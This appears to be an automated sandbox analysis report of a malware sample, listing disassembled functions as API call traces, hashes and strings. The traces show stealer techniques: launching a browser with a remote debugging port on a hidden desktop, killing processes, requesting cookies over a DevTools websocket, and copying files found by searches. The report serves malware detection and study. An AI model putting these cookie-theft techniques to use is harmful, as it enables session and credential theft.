                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 0196d33f65701f0c94f3d61bd8f3971df76662dfb0b012d1dc845e8450cc5e4e
                                • Instruction ID: 88950e59d1391806d5f5413648b7a5efb905ae857af3d866ccc562b66729600b
                                • Opcode Fuzzy Hash: 0196d33f65701f0c94f3d61bd8f3971df76662dfb0b012d1dc845e8450cc5e4e
                                • Instruction Fuzzy Hash: 9BC14571A10606ABCB21AFB6D899FBE77AAAF41300F04012DE84ADB351DF74D945CB90
                                Function 006C9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006C9790
                                • lstrcat.KERNEL32(?,?), ref: 006C97A0
                                • lstrcat.KERNEL32(?,?), ref: 006C97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006C97C3
                                • memset.MSVCRT ref: 006C97D7
                                  • Part of subcall function 006E3E70: lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E3EA5
                                  • Part of subcall function 006E3E70: lstrcpy.KERNEL32(00000000,00F1FF58), ref: 006E3ECF
                                  • Part of subcall function 006E3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006C134E,?,0000001A), ref: 006E3ED9
                                • wsprintfA.USER32 ref: 006C9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006C9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006C9844
                                  • Part of subcall function 006E46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006E46B9
                                  • Part of subcall function 006E46A0: Process32First.KERNEL32(00000000,00000128), ref: 006E46C9
                                  • Part of subcall function 006E46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006E46DB
                                  • Part of subcall function 006E46A0: StrCmpCA.SHLWAPI(?,?), ref: 006E46ED
                                  • Part of subcall function 006E46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E4702
                                  • Part of subcall function 006E46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006E4711
                                  • Part of subcall function 006E46A0: CloseHandle.KERNEL32(00000000), ref: 006E4718
                                  • Part of subcall function 006E46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006E4726
                                  • Part of subcall function 006E46A0: CloseHandle.KERNEL32(00000000), ref: 006E4731
                                • lstrcat.KERNEL32(00000000,?), ref: 006C9878
                                • lstrcat.KERNEL32(00000000,?), ref: 006C9889
                                • lstrcat.KERNEL32(00000000,006F4B60), ref: 006C989B
                                • memset.MSVCRT ref: 006C98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006C98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C9903
                                • StrStrA.SHLWAPI(00000000,00F204D8), ref: 006C9919
                                • lstrcpyn.KERNEL32(008F93D0,00000000,00000000), ref: 006C9938
                                • lstrlen.KERNEL32(?), ref: 006C994B
                                • wsprintfA.USER32 ref: 006C995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 006C9971
                                • Sleep.KERNEL32(00001388), ref: 006C99E7
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C92E1
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C92FA
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C9399
                                  • Part of subcall function 006C92B0: strlen.MSVCRT ref: 006C93E6
                                  • Part of subcall function 006E4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006E4759
                                  • Part of subcall function 006E4740: Process32First.KERNEL32(00000000,00000128), ref: 006E4769
                                  • Part of subcall function 006E4740: Process32Next.KERNEL32(00000000,00000128), ref: 006E477B
                                  • Part of subcall function 006E4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E479C
                                  • Part of subcall function 006E4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006E47AB
                                  • Part of subcall function 006E4740: CloseHandle.KERNEL32(00000000), ref: 006E47B2
                                  • Part of subcall function 006E4740: Process32Next.KERNEL32(00000000,00000128), ref: 006E47C0
                                  • Part of subcall function 006E4740: CloseHandle.KERNEL32(00000000), ref: 006E47CB
                                • CloseDesktop.USER32(?), ref: 006C9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 412001530d699b65cbba34520e079a63f68fe6548fd13df746c14b0f618f9507
                                • Instruction ID: 74dc14af113910f17d0acd40a90b2cfc4861647f95fe8a1c504a31d16803c948
                                • Opcode Fuzzy Hash: 412001530d699b65cbba34520e079a63f68fe6548fd13df746c14b0f618f9507
                                • Instruction Fuzzy Hash: 6A9152B1910218AFDB50DBB4DC49FEE77B9FF44700F104599FA09A7291DE70AA44CBA4
                                Function 006DE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006DE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DE243
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DE263
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DE27D
                                • wsprintfA.USER32 ref: 006DE2A2
                                • StrCmpCA.SHLWAPI(?,006ECFEC), ref: 006DE2B4
                                • wsprintfA.USER32 ref: 006DE2D1
                                  • Part of subcall function 006DEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006DEE12
                                • wsprintfA.USER32 ref: 006DE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006DE304
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DE335
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DE347
                                • lstrcat.KERNEL32(?,?), ref: 006DE358
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DE36A
                                • lstrcat.KERNEL32(?,?), ref: 006DE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE422
                                • DeleteFileA.KERNEL32(?), ref: 006DE45C
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DE49B
                                • FindClose.KERNEL32(00000000), ref: 006DE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 3a7eefaf27bffa1512f8c6ff3380857c59088ef477082f4f323a3eb018948c5f
                                • Instruction ID: 6dd942fad098d5a14304cb7974b5498254e76a3ee8cac1c7401bd62104a712e4
                                • Opcode Fuzzy Hash: 3a7eefaf27bffa1512f8c6ff3380857c59088ef477082f4f323a3eb018948c5f
                                • Instruction Fuzzy Hash: 9F814E71900219ABCB60EFB5DC49EFE77BAFF84300F004599B94A97251DE35AA45CFA0
                                Function 006C16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C16E2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C176C
                                • lstrcat.KERNEL32(00000000), ref: 006C1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: da7468f6b6fb455a2ec3dfdbd7395f4013fab37e5fe2d7d7c1abcd1436346ef1
                                • Instruction ID: a0d65a61c0efca2ce2cf3182f3f499c310c568eb53df3a68c66c64fa5f646e25
                                • Opcode Fuzzy Hash: da7468f6b6fb455a2ec3dfdbd7395f4013fab37e5fe2d7d7c1abcd1436346ef1
                                • Instruction Fuzzy Hash: E7812E7191161A9BCB61EFA6D899FBE77B6FF46300F04012CF8099B252CB349D41CBA5
                                Function 006DDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006DDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006DDD4C
                                • wsprintfA.USER32 ref: 006DDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DDD79
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DDD9C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DDDB6
                                • wsprintfA.USER32 ref: 006DDDD4
                                • DeleteFileA.KERNEL32(?), ref: 006DDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DDDED
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                  • Part of subcall function 006DD980: memset.MSVCRT ref: 006DD9A1
                                  • Part of subcall function 006DD980: memset.MSVCRT ref: 006DD9B3
                                  • Part of subcall function 006DD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DD9DB
                                  • Part of subcall function 006DD980: lstrcpy.KERNEL32(00000000,?), ref: 006DDA0E
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00000000), ref: 006DDA1C
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00F205B0), ref: 006DDA36
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,?), ref: 006DDA4A
                                  • Part of subcall function 006DD980: lstrcat.KERNEL32(?,00F1F020), ref: 006DDA5E
                                  • Part of subcall function 006DD980: lstrcpy.KERNEL32(00000000,?), ref: 006DDA8E
                                  • Part of subcall function 006DD980: GetFileAttributesA.KERNEL32(00000000), ref: 006DDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DDE2E
                                • FindClose.KERNEL32(00000000), ref: 006DDE3D
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DDE66
                                • lstrcat.KERNEL32(?,00F1F1A0), ref: 006DDE7A
                                • lstrlen.KERNEL32(?), ref: 006DDE84
                                • lstrlen.KERNEL32(?), ref: 006DDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 862e9b2d2f7a529702a04be762b8ac6e7c74f38b18b5048821b5d42c668540c6
                                • Instruction ID: 3511f92b548c591a8fd86fdb829f147bfe1fb704d614691f8ea1bf59c591b569
                                • Opcode Fuzzy Hash: 862e9b2d2f7a529702a04be762b8ac6e7c74f38b18b5048821b5d42c668540c6
                                • Instruction Fuzzy Hash: F5612E71910209ABCB60EBB5DC99EFE77BAFF88300F0045A9F94997251DF34AA54CB50
                                Function 006DD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006DD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DD564
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DD584
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DD59E
                                • lstrcat.KERNEL32(?,00F20BA8), ref: 006DD5E3
                                • lstrcat.KERNEL32(?,00F20CD8), ref: 006DD5F7
                                • lstrcat.KERNEL32(?,?), ref: 006DD60B
                                • lstrcat.KERNEL32(?,?), ref: 006DD61C
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DD62E
                                • lstrcat.KERNEL32(?,?), ref: 006DD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006DD737
                                • FindClose.KERNEL32(00000000), ref: 006DD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 31135874d0ad6f44aa8ebe2279fba7a68e91592e1382dfb339b71e3f87286241
                                • Instruction ID: 2bc5e95005e24ae33c5e4ba060ece2006abe042601e5853f386bd13fc879a0ef
                                • Opcode Fuzzy Hash: 31135874d0ad6f44aa8ebe2279fba7a68e91592e1382dfb339b71e3f87286241
                                • Instruction Fuzzy Hash: 4B612FB1910119ABCB60EFB5DC88EEE77B9FF48300F0045A9EA4997351DE34AA44CF90
                                Function 006E48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: b3a19339da339b811591a03b62e01508b0e5db74b0befe874e1134fb21a580ed
                                • Instruction ID: 64213055c452378c7d304a445b339aa10172db637efcb34d0d0fa356e0ce57b4
                                • Opcode Fuzzy Hash: b3a19339da339b811591a03b62e01508b0e5db74b0befe874e1134fb21a580ed
                                • Instruction Fuzzy Hash: 5EA25971D022A99FDB60CFA9C840BEDBBB6BF48304F1481AAD509A7341DB715E85CF90
                                Function 006D23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2402
                                • lstrlen.KERNEL32(\*.*), ref: 006D240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
